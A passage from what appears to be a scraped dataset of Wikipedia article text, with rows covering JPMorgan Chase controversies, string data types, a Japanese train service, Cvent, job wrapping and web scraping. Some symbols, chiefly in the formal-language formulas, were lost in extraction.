settlement subjected Chase to an independent probe of its conduct of activity which occurred from the company's offices in Paris and Ch teauneuf-sur-Cher, in southern France, during the World War II-era. 53 The settlement also made possible the company having to eventually a pay modest but symbolically important, payouts to former Chase customers after the probe was completed. 53 It was determined that Chase only owned a sum that was well under $1 million in asset reparations by this point in time. 53 The settlement made Chase Manhattan the first bank to reach a settlement over Holocaust-related claims. 53 In February 2000, more than fifty years after information regarding the ties between Chase and Nazi Germany was revealed during Congressional hearings, Chase Manhattan publicly acknowledged the deal its predecessor Chase National Bank made with Nazi Germany which helped the German government exchange marks and which also likely originated from the forced sale of assets by Jewish refugees. 54 JPMorgan Chase has paid $16 billion in fines, settlements, and other litigation expenses from 2011 to 2013. Of the $16 billion JPMorgan Chase has paid, about $8.5 billion were for fines and settlements resulting from illegal actions taken by bank executives, according to Richard Eskow at the Campaign for America's Future, who cited a new report from Joshua Rosner of Graham Fisher Co. The $16 billion total does not include a recent settlement that calls for JPMorgan Chase to pay $100 million to waive $417 million in claims it had made against clients of the firm MF Global. The U.S. Treasury's Office of Foreign Assets Control found that JPMorgan had illegally aided dictatorships in Cuba, Sudan, Liberia and Iran, including transferring 32,000 ounces of gold bullion (valued at approximately $20,560,000) to the benefit of a bank in Iran. JPMorgan did not voluntarily self-disclose the Iranian matter to OFAC. 55 Among its other transgressions, JPMorgan has been found to have: 56 57 58 59 60 61 During 2013 and 2014, Chase and other banks received media attention for the practice of cancelling the personal and business accounts of hundreds of legal sex workers, citing in some instances the "morality clause" of their account agreement. 62 Later it was discovered that this practice included mortgage accounts and business loans. 63 Chase canceled the mortgage refinancing process for one individual, that the bank had initiated, whose production company made soft core films like those broadcast on Cinemax. 64 This resulted in a lawsuit 65 which cited evasive dealings and misleading statements by several Chase executives including Securities Vice President Adam Gelcich, Legal Fair Lending Department Vice President Deb Vincent, and an unnamed executive director and assistant general counsel. 66 In addition to closing accounts for sex workers, the bank has also been using its "morality clause" to disassociate from other types of businesses. 67 Some of these other businesses include medical marijuana dispensaries and any that are "gun related". 67 Another was a woman-owned condom manufacturing company called Lovability Condoms. Company founder Tiffany Gaines was rejected by Chase Paymentech services "as processing sales for adult-oriented products is a prohibited vertical" and was told that it was a "reputational risk" to process payment for condoms. 67 Gaines then started a petition to ask Chase to review and change its policy of classifying condoms as an "adult oriented product". The bank later reversed its decision and invited Gaines to submit an application citing that was already doing business with a "wide variety of merchants, including grocers and drug stores, that sell similar products". 68 In 2019, the bank faced growing criticism for its alleged practice of arbitrarily targeting the personal accounts of outspoken online personalities such as Martina Markota and Proud Boys chairman Enrique Tarrio. Although the specific motives behind the closures were not officially disclosed the assumption among many on the right was that they were political in nature. 69 Financial documents 70 from Energy Transfer Partners, the pipeline builder for the Dakota Access Pipeline, lists a number of large banking institutions that have provided credit for the project, including JP Morgan Chase. Because of these financial ties, Chase and other banks were a target 71 of the Dakota Access Pipeline protests during 2016 and 2017. JPMorgan Chase agreed to pay $5 million to compensate their male employees who did not receive the same paid parental leave as women from 2011 to 2017. 72 In December 2017, the bank "clarified its policy to ensure equal access to men and women looking to be their new child's main caregiver". 73 According to the involved attorneys, this is the biggest recorded settlement in a U.S. parental leave discrimination case. JPMorgan agreed to train and monitor to ensure equal parental leave benefits and stated that "its policy was always intended to be gender-neutral". 74 Chase has faced criticism and protests over its high rate of investment in various fossil fuel industries such as coal, oil, and gas. 75 A study released in October 2019 indicated that Chase invests more ($75 billion) in fossil fuels than any other bank. 76 An analysis of home purchases in Chicago from 2012 to 2018 by City Bureau and WBEZ Chicago showed that JP Morgan Chase, "loaned 41 times more in Chicago’s white neighborhoods than it did in the city’s black neighborhoods. 77 The report prompted protests at Chicago Chase branches in June 2020. 78 At a reopening of a remodeled Chase branch in Chicago's South Shore, Dimon said via video, "we have targets now to do $600 million (over the next five years) in new mortgages for Blacks and new homeowners in Chicago neighborhoods. 79 The U.S. government sued JP Morgan Chase Bank in 2022, alleging that JP Morgan "facilitated, sustained, and concealed the human trafficking network operated by Jeffrey Epstein. 80 |
152 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Wikipedia:Contents | Explore the vast knowledge of Wikipedia through these helpful resources. If you have a specific topic in mind, use Wikipedia's search box. If you don't know exactly what you are looking for or wish to explore broad areas, click on a link in the header menu at the top of this page, or begin your browsing below: Wikipedia organizes its content into distinct subject classifications, each with further subdivisions. Explore the diverse cultures, arts, beliefs, and customs of human societies. Discover the wonders of Earth's lands, features, inhabitants, and planetary phenomena. Learn about physical, mental, and social health. Dive into the past through written records and scholarly exploration. Explore chronological events through our comprehensive timelines. Stay up-to-date with encyclopedia entries covering ongoing events. Delve into diverse human actions, from leisure and entertainment to industry and warfare. Explore the study of quantity, structure, space, and change. Understand natural phenomena through empirical evidence, observations, and experiments. Learn about collective entities, ethnic groups, and nations. Dive deep into fundamental questions about existence, knowledge, values, and more. Access comprehensive information collections compiled for easy retrieval. Refer to various third-party classification systems linked to Wikipedia articles. Access sources on specific topics for further reading or verification. Explore social-cultural systems, beliefs, ethics, and more. Understand collectives, social interactions, political authority, and cultural norms. Learn about techniques, skills, methods, and processes in technology and science. Get summaries of broad topics with links to subtopics, biographies, and related articles. Explore topics in outline format, linking to more detailed articles. Find enumerations of specific types, such as lists of countries and people. Access featured articles, images, news, and more through thematic portals. Access lists of terms with definitions through alphabetical glossaries. Browse Wikipedia's category pages, which index articles by subject. Explore subjects that demand high-quality articles, grouped by importance. Discover Wikipedia's best, reviewed and vetted for quality. Explore well-written, factually accurate articles that meet editorial standards. Listen to Wikipedia articles as spoken word recordings. Browse Wikipedia's articles alphabetically. Topics Types Places, people and times Indices |
153 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/String_(computer_science) | In computer programming, a string is traditionally a sequence of characters, either as a literal constant or as some kind of variable. The latter may allow its elements to be mutated and the length changed, or it may be fixed (after creation). A string is generally considered as a data type and is often implemented as an array data structure of bytes (or words) that stores a sequence of elements, typically characters, using some character encoding. String may also denote more general arrays or other sequence (or list) data types and structures. Depending on the programming language and precise data type used, a variable declared to be a string may either cause storage in memory to be statically allocated for a predetermined maximum length or employ dynamic allocation to allow it to hold a variable number of elements. When a string appears literally in source code, it is known as a string literal or an anonymous string. 1 In formal languages, which are used in mathematical logic and theoretical computer science, a string is a finite sequence of symbols that are chosen from a set called an alphabet. A primary purpose of strings is to store human-readable text, like words and sentences. Strings are used to communicate information from a computer program to the user of the program. 2 A program may also accept string input from its user. Further, strings may store data expressed as characters yet not intended for human reading. Example strings and their purposes: The term string may also designate a sequence of data or computer records other than characters — like a "string of bits" — but when used without qualification it refers to strings of characters. 4 Use of the word "string" to mean any items arranged in a line, series or succession dates back centuries. 5 6 In 19th-Century typesetting, compositors used the term "string" to denote a length of type printed on paper; the string would be measured to determine the compositor's pay. 7 4 8 Use of the word "string" to mean "a sequence of symbols or linguistic elements in a definite order" emerged from mathematics, symbolic logic, and linguistic theory to speak about the formal behavior of symbolic systems, setting aside the symbols' meaning. 4 For example, logician C. I. Lewis wrote in 1918: 9 A mathematical system is any set of strings of recognisable marks in which some of the strings are taken initially and the remainder derived from these by operations performed according to rules which are independent of any meaning assigned to the marks. That a system should consist of 'marks' instead of sounds or odours is immaterial. According to Jean E. Sammet, "the first realistic string handling and pattern matching language" for computers was COMIT in the 1950s, followed by the SNOBOL language of the early 1960s. 10 A string datatype is a datatype modeled on the idea of a formal string. Strings are such an important and useful datatype that they are implemented in nearly every programming language. In some languages they are available as primitive types and in others as composite types. The syntax of most high-level programming languages allows for a string, usually quoted in some way, to represent an instance of a string datatype; such a meta-string is called a literal or string literal. Although formal strings can have an arbitrary finite length, the length of strings in real languages is often constrained to an artificial maximum. In general, there are two types of string datatypes: fixed-length strings, which have a fixed maximum length to be determined at compile time and which use the same amount of memory whether this maximum is needed or not, and variable-length strings, whose length is not arbitrarily fixed and which can use varying amounts of memory depending on the actual requirements at run time (see Memory management). Most strings in modern programming languages are variable-length strings. Of course, even variable-length strings are limited in length by the size of available computer memory. The string length can be stored as a separate integer (which may put another artificial limit on the length) or implicitly through a termination character, usually a character value with all bits zero such as in C programming language. See also "Null-terminated" below. String datatypes have historically allocated one byte per character, and, although the exact character set varied by region, character encodings were similar enough that programmers could often get away with ignoring this, since characters a program treated specially (such as period and space and comma) were in the same place in all the encodings a program would encounter. These character sets were typically based on ASCII or EBCDIC. If text in one encoding was displayed on a system using a different encoding, text was often mangled, though often somewhat readable and some computer users learned to read the mangled text. Logographic languages such as Chinese, Japanese, and Korean (known collectively as CJK) need far more than 256 characters (the limit of a one 8 bit byte per-character encoding) for reasonable representation. The normal solutions involved keeping single-byte representations for ASCII and using two-byte representations for CJK ideographs. Use of these with existing code led to problems with matching and cutting of strings, the severity of which depended on how the character encoding was designed. Some encodings such as the EUC family guarantee that a byte value in the ASCII range will represent only that ASCII character, making the encoding safe for systems that use those characters as field separators. Other encodings such as ISO 2022 and Shift-JIS do not make such guarantees, making matching on byte codes unsafe. These encodings also were not "self-synchronizing", so that locating character boundaries required backing up to the start of a string, and pasting two strings together could result in corruption of the second string. Unicode has simplified the picture somewhat. Most programming languages now have a datatype for Unicode strings. Unicode's preferred byte stream format UTF 8 is designed not to have the problems described above for older multibyte encodings. UTF 8, UTF 16 and UTF 32 require the programmer to know that the fixed-size code units are different from the "characters", the main difficulty currently is incorrectly designed APIs that attempt to hide this difference (UTF 32 does make code points fixed-sized, but these are not "characters" due to composing codes). Some languages, such as C , Perl and Ruby, normally allow the contents of a string to be changed after it has been created; these are termed mutable strings. In other languages, such as Java, JavaScript, Lua, Python, and Go, the value is fixed and a new string must be created if any alteration is to be made; these are termed immutable strings. Some of these languages with immutable strings also provide another type that is mutable, such as Java and .NET's StringBuilder, the thread-safe Java StringBuffer, and the Cocoa NSMutableString. There are both advantages and disadvantages to immutability: although immutable strings may require inefficiently creating many copies, they are simpler and completely thread-safe. Strings are typically implemented as arrays of bytes, characters, or code units, in order to allow fast access to individual units or substrings—including characters when they have a fixed length. A few languages such as Haskell implement them as linked lists instead. Some languages, such as Prolog and Erlang, avoid implementing a dedicated string datatype at all, instead adopting the convention of representing strings as lists of character codes. Representations of strings depend heavily on the choice of character repertoire and the method of character encoding. Older string implementations were designed to work with repertoire and encoding defined by ASCII, or more recent extensions like the ISO 8859 series. Modern implementations often use the extensive repertoire defined by Unicode along with a variety of complex encodings such as UTF 8 and UTF 16. The term byte string usually indicates a general-purpose string of bytes, rather than strings of only (readable) characters, strings of bits, or such. Byte strings often imply that bytes can take any value and any data can be stored as-is, meaning that there should be no value interpreted as a termination value. Most string implementations are very similar to variable-length arrays with the entries storing the character codes of corresponding characters. The principal difference is that, with certain encodings, a single logical character may take up more than one entry in the array. This happens for example with UTF 8, where single codes (UCS code points) can take anywhere from one to four bytes, and single characters can take an arbitrary number of codes. In these cases, the logical length of the string (number of characters) differs from the physical length of the array (number of bytes in use). UTF 32 avoids the first part of the problem. The length of a string can be stored implicitly by using a special terminating character; often this is the null character (NUL), which has all bits zero, a convention used and perpetuated by the popular C programming language. 11 Hence, this representation is commonly referred to as a C string. This representation of an n-character string takes n 1 space (1 for the terminator), and is thus an implicit data structure. In terminated strings, the terminating code is not an allowable character in any string. Strings with length field do not have this limitation and can also store arbitrary binary data. An example of a null-terminated string stored in a 10 byte buffer, along with its ASCII (or more modern UTF 8) representation as 8 bit hexadecimal numbers is: The length of the string in the above example, "FRANK", is 5 characters, but it occupies 6 bytes. Characters after the terminator do not form part of the representation; they may be either part of other data or just garbage. (Strings of this form are sometimes called ASCIZ strings, after the original assembly language directive used to declare them.) Using a special byte other than null for terminating strings has historically appeared in both hardware and software, though sometimes with a value that was also a printing character. was used by many assembler systems, : used by CDC systems (this character had a value of zero), and the ZX80 used 12 since this was the string delimiter in its BASIC language. Somewhat similar, "data processing" machines like the IBM 1401 used a special word mark bit to delimit strings at the left, where the operation would start at the right. This bit had to be clear in all other parts of the string. This meant that, while the IBM 1401 had a seven-bit word, almost no-one ever thought to use this as a feature, and override the assignment of the seventh bit to (for example) handle ASCII codes. Early microcomputer software relied upon the fact that ASCII codes do not use the high-order bit, and set it to indicate the end of a string. It must be reset to 0 prior to output. 13 The length of a string can also be stored explicitly, for example by prefixing the string with the length as a byte value. This convention is used in many Pascal dialects; as a consequence, some people call such a string a Pascal string or P-string. Storing the string length as byte limits the maximum string length to 255. To avoid such limitations, improved implementations of P-strings use 16 , 32 , or 64 bit words to store the string length. When the length field covers the address space, strings are limited only by the available memory. If the length is bounded, then it can be encoded in constant space, typically a machine word, thus leading to an implicit data structure, taking n k space, where k is the number of characters in a word (8 for 8 bit ASCII on a 64 bit machine, 1 for 32 bit UTF 32 UCS 4 on a 32 bit machine, etc.). If the length is not bounded, encoding a length n takes log(n) space (see fixed-length code), so length-prefixed strings are a succinct data structure, encoding a string of length n in log(n) n space. In the latter case, the length-prefix field itself does not have fixed length, therefore the actual string data needs to be moved when the string grows such that the length field needs to be increased. Here is a Pascal string stored in a 10 byte buffer, along with its ASCII UTF 8 representation: Many languages, including object-oriented ones, implement strings as records with an internal structure like: However, since the implementation is usually hidden, the string must be accessed and modified through member functions. text is a pointer to a dynamically allocated memory area, which might be expanded as needed. See also string (C ). Both character termination and length codes limit strings: For example, C character arrays that contain null (NUL) characters cannot be handled directly by C string library functions: Strings using a length code are limited to the maximum value of the length code. Both of these limitations can be overcome by clever programming. It is possible to create data structures and functions that manipulate them that do not have the problems associated with character termination and can in principle overcome length code bounds. It is also possible to optimize the string represented using techniques from run length encoding (replacing repeated characters by the character value and a length) and Hamming encoding clarification needed . While these representations are common, others are possible. Using ropes makes certain string operations, such as insertions, deletions, and concatenations more efficient. The core data structure in a text editor is the one that manages the string (sequence of characters) that represents the current state of the file being edited. While that state could be stored in a single long consecutive array of characters, a typical text editor instead uses an alternative representation as its sequence data structure—a gap buffer, a linked list of lines, a piece table, or a rope—which makes certain string operations, such as insertions, deletions, and undoing previous edits, more efficient. 14 The differing memory layout and storage requirements of strings can affect the security of the program accessing the string data. String representations requiring a terminating character are commonly susceptible to buffer overflow problems if the terminating character is not present, caused by a coding error or an attacker deliberately altering the data. String representations adopting a separate length field are also susceptible if the length can be manipulated. In such cases, program code accessing the string data requires bounds checking to ensure that it does not inadvertently access or change data outside of the string memory limits. String data is frequently obtained from user input to a program. As such, it is the responsibility of the program to validate the string to ensure that it represents the expected format. Performing limited or no validation of user input can cause a program to be vulnerable to code injection attacks. Sometimes, strings need to be embedded inside a text file that is both human-readable and intended for consumption by a machine. This is needed in, for example, source code of programming languages, or in configuration files. In this case, the NUL character does not work well as a terminator since it is normally invisible (non-printable) and is difficult to input via a keyboard. Storing the string length would also be inconvenient as manual computation and tracking of the length is tedious and error-prone. Two common representations are: While character strings are very common uses of strings, a string in computer science may refer generically to any sequence of homogeneously typed data. A bit string or byte string, for example, may be used to represent non-textual binary data retrieved from a communications medium. This data may or may not be represented by a string-specific datatype, depending on the needs of the application, the desire of the programmer, and the capabilities of the programming language being used. If the programming language's string implementation is not 8 bit clean, data corruption may ensue. C programmers draw a sharp distinction between a "string", aka a "string of characters", which by definition is always null terminated, vs. a "byte string" or "pseudo string" which may be stored in the same array but is often not null terminated. Using C string handling functions on such a "byte string" often seems to work, but later leads to security problems. 15 16 17 There are many algorithms for processing strings, each with various trade-offs. Competing algorithms can be analyzed with respect to run time, storage requirements, and so forth. The name stringology was coined in 1984 by computer scientist Zvi Galil for the theory of algorithms and data structures used for string processing. 18 19 20 Some categories of algorithms include: Advanced string algorithms often employ complex mechanisms and data structures, among them suffix trees and finite-state machines. Character strings are such a useful datatype that several languages have been designed in order to make string processing applications easy to write. Examples include the following languages: Many Unix utilities perform simple string manipulations and can be used to easily program some powerful string processing algorithms. Files and finite streams may be viewed as strings. Some APIs like Multimedia Control Interface, embedded SQL or printf use strings to hold commands that will be interpreted. Many scripting programming languages, including Perl, Python, Ruby, and Tcl employ regular expressions to facilitate text operations. Perl is particularly noted for its regular expression use, 21 and many other languages and applications implement Perl compatible regular expressions. Some languages such as Perl and Ruby support string interpolation, which permits arbitrary expressions to be evaluated and included in string literals. String functions are used to create strings or change the contents of a mutable string. They also are used to query information about a string. The set of functions and their names varies depending on the computer programming language. The most basic example of a string function is the string length function the function that returns the length of a string (not counting any terminator characters or any of the string's internal structural information) and does not modify the string. This function is often named length or len. For example, length("hello world") would return 11. Another common function is concatenation, where a new string is created by appending two strings, often this is the addition operator. Some microprocessor's instruction set architectures contain direct support for string operations, such as block copy (e.g. In intel x86m REPNZ MOVSB). 22 Let be a finite set of distinct, unambiguous symbols (alternatively called characters), called the alphabet. A string (or word 23 or expression 24 ) over is any finite sequence of symbols from . 25 For example, if 0, 1 , then 01011 is a string over . The length of a string s is the number of symbols in s (the length of the sequence) and can be any non-negative integer; it is often denoted as s . The empty string is the unique string over of length 0, and is denoted or . 25 26 The set of all strings over of length n is denoted n. For example, if 0, 1 , then 2 00, 01, 10, 11 . We have 0 for every alphabet . The set of all strings over of any length is the Kleene closure of and is denoted . In terms of n, For example, if 0, 1 , then , 0, 1, 00, 01, 10, 11, 000, 001, 010, 011, ... . Although the set itself is countably infinite, each element of is a string of finite length. A set of strings over (i.e. any subset of ) is called a formal language over . For example, if 0, 1 , the set of strings with an even number of zeros, , 1, 00, 11, 001, 010, 100, 111, 0000, 0011, 0101, 0110, 1001, 1010, 1100, 1111, ... , is a formal language over . Concatenation is an important binary operation on . For any two strings s and t in , their concatenation is defined as the sequence of symbols in s followed by the sequence of characters in t, and is denoted st. For example, if a, b, ..., z , s bear, and t hug, then st bearhug and ts hugbear. String concatenation is an associative, but non-commutative operation. The empty string serves as the identity element; for any string s, s s s. Therefore, the set and the concatenation operation form a monoid, the free monoid generated by . In addition, the length function defines a monoid homomorphism from to the non-negative integers (that is, a function L : N 0 displaystyle L: Sigma mapsto mathbb N cup 0 , such that L ( s t ) L ( s ) L ( t ) s , t displaystyle L(st) L(s) L(t) quad forall s,t in Sigma ). A string s is said to be a substring or factor of t if there exist (possibly empty) strings u and v such that t usv. The relation "is a substring of" defines a partial order on , the least element of which is the empty string. A string s is said to be a prefix of t if there exists a string u such that t su. If u is nonempty, s is said to be a proper prefix of t. Symmetrically, a string s is said to be a suffix of t if there exists a string u such that t us. If u is nonempty, s is said to be a proper suffix of t. Suffixes and prefixes are substrings of t. Both the relations "is a prefix of" and "is a suffix of" are prefix orders. The reverse of a string is a string with the same symbols but in reverse order. For example, if s abc (where a, b, and c are symbols of the alphabet), then the reverse of s is cba. A string that is the reverse of itself (e.g., s madam) is called a palindrome, which also includes the empty string and all strings of length 1. A string s uv is said to be a rotation of t if t vu. For example, if 0, 1 the string 0011001 is a rotation of 0100110, where u 00110 and v 01. As another example, the string abc has three different rotations, viz. abc itself (with u abc, v ), bca (with u bc, v a), and cab (with u c, v ab). It is often useful to define an ordering on a set of strings. If the alphabet has a total order (cf. alphabetical order) one can define a total order on called lexicographical order. The lexicographical order is total if the alphabetical order is, but is not well-founded for any nontrivial alphabet, even if the alphabetical order is. For example, if 0, 1 and 0 1, then the lexicographical order on includes the relationships 0 00 000 ... 0001 ... 001 ... 01 010 ... 011 0110 ... 01111 ... 1 10 100 ... 101 ... 111 ... 1111 ... 11111 ... With respect to this ordering, e.g. the infinite set 1, 01, 001, 0001, 00001, 000001, ... has no minimal element. See Shortlex for an alternative string ordering that preserves well-foundedness. For the example alphabet, the shortlex order is 0 1 00 01 10 11 000 001 010 011 100 101 0110 111 0000 0001 0010 0011 ... 1111 00000 00001 ... A number of additional operations on strings commonly occur in the formal theory. These are given in the article on string operations. Strings admit the following interpretation as nodes on a graph, where k is the number of symbols in : The natural topology on the set of fixed-length strings or variable-length strings is the discrete topology, but the natural topology on the set of infinite strings is the limit topology, viewing the set of infinite strings as the inverse limit of the sets of finite strings. This is the construction used for the p-adic numbers and some constructions of the Cantor set, and yields the same topology. Isomorphisms between string representations of topologies can be found by normalizing according to the lexicographically minimal string rotation. |
154 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Special:Random | The Rakuraku Biwako ( , Rakuraku Biwako) is a commuter limited express train service operated by West Japan Railway Company (JR West) between Osaka and Maibara or Kusatsu in Japan since June 2003. It replaced the previous Biwako Liner services. 1 As of March 2024 update , one weekday morning service (Rakuraku Biwako 1) runs from Maibara to Osaka, and two weekday evening services (Rakuraku Biwako 2 4) run from Osaka to Maibara and Kusatsu respectively, with the journey time from Osaka to Maibara taking approximately 1 hour 28 minutes. 2 Services were initially operated using the nine-car 681 series or 683 series EMUs used on Thunderbird services. 1 Rakuraku Biwako 1 and 2 (between Osaka and Maibara) are formed as follows, with car 1 at the Maibara end. 3 Rakuraku Biwako 4 (Osaka to Kusatsu) is formed as follows, with car 1 at the Osaka end. 4 The Biwako Express service was introduced from 2 June 2003. 5 The service was made entirely no-smoking from 1 June 2009. 6 The service started calling at Minami-Kusatsu Station, 7 and all seats become reserved 8 from 13 March 2021. Effective the 16 March 2024 timetable revision, all services were renamed to Rakuraku Biwako. At the same time, 9 car 683 series sets operated on this service were replaced with 6 car 681 or 683 series sets. 9 |
155 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Cvent,_Inc. | Cvent Holding Corp. is a Tysons Corner, Virginia-based company that provides software-as-a-service (SaaS) solutions for meetings, events, and hospitality management. Their web-based platform caters to in-person, virtual, and hybrid events, offering functionalities like online registration, venue selection, event management tools, and attendee engagement features. Cvent also provides software for hotels and venues to manage group bookings, including corporate travel, and source new group business. 4 Previously a public company, Cvent was acquired by investment firm Blackstone Inc. for $4.6 billion in June 2023. 3 5 Cvent is headquartered in Tysons Corner, Virginia, a suburb of Washington D.C., with other U.S. offices in Texas, Oregon, Utah, and Virginia. International Cvent offices include Canada, the United Kingdom, and India. Cvent traded on the Nasdaq Global Market under the stock symbol CVT prior to being taken private by Blackstone. 6 Cvent was founded in September 1999 by Reggie Aggarwal. 7 At its founding, Cvent had an initial staff of six individuals working in technology, business, and marketing. 8 Prior to co-founding Cvent in 1999, Reggie served as the president of the Indian CEO Network. 9 In 2018 and 2019 Reggie was named the number one influential SaaS CEO by the SaaS Report. 10 11 In 1999, Cvent received US$17 million in venture capital and grew its staff to 125 employees. 12 In April 2001, Cvent had 300 customers, including MCO WorldCom, McDonald's, Princeton University, University of Virginia, Ernst Young, and Hughes Network Systems. 13 Following the dot-com bubble burst and the September 11 attacks, Cvent faced near-bankruptcy and was forced to cut 80% of its staff. The company became profitable again in 2003. 14 In 2011, Cvent was growing by 50% a year and received $136 million of funding from New Enterprise Associates in July 2011, which, at the time, was the largest investment in a U.S. software company since 2007. 12 15 16 Cvent filed an S 1 with the U.S. Securities and Exchange Commission on July 8, 2013, proposing an initial public offering of 5.6 million shares. 17 The company went public on the New York Stock Exchange on August 9, 2013, at an initial price of $21. 17 18 Cvent raised $117.6 million and received a market capitalization of over $1 billion. The IPO was referenced in regard to its use of the JOBS Act, which enabled the company to quickly offer an IPO. 18 In 2016, the company was acquired by venture capital company Vista Equity Partners for $1.65 billion. 19 Ashok Trivedi, the co-founder of Mastech Digital and iGate was an early investor in the company. 20 On July 20, 2021, the WSJ reported that Cvent Nears $5 Billion-Plus SPAC(DGNS) Deal. 21 Following the close of a merger deal with Dragoneer Growth Opportunities Corp. II, a special purpose acquisition company (SPAC), Cvent went public on the Nasdaq Global Market. on December 9, 2021. 22 23 In March 2023, Cvent agreed to be taken private again by Blackstone Inc. in a $4.6 billion deal that includes a significant minority investment from the Abu Dhabi Investment Authority. 24 Cvent's current products are listed under three categories, Event Marketing Management, Exchange, and Suppliers Venues. 39 In July 2000, Cvent introduced its first SaaS product, a web-based tool for event planners to manage invitations and collect registration fees. 13 40 In 2006, it introduced a product for conducting online surveys, which was followed by the introduction of the Cvent Supplier Network two years later. The Supplier Network is an online marketing place that connects meeting planners with venues and services. 41 42 In 2009, the company began offering professional services. 43 Cvent produces the Destination Guide an online travel guide designed for meeting planners with information about 800 different destinations. 44 |
156 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Job_wrapping | Job wrapping is a term used commonly to describe a process by which jobs can be captured from employer website and posted to the job boards that the employer wants to advertise them. 1 Corporate recruiters and HR professionals who send job listings to multiple Internet employment sites can sometimes delegate those chores to the employment sites themselves under an arrangement called "job wrapping". Job wrap ensures that employer job openings and updates get wrapped up regularly and posted on the job boards that they have designated. The term "job wrapping" is synonymous with "spidering", "scraping", or "mirroring". Job wrapping is generally done by a third party vendor. This business term article is a stub. You can help Wikipedia by expanding it. |
157 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-15 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The 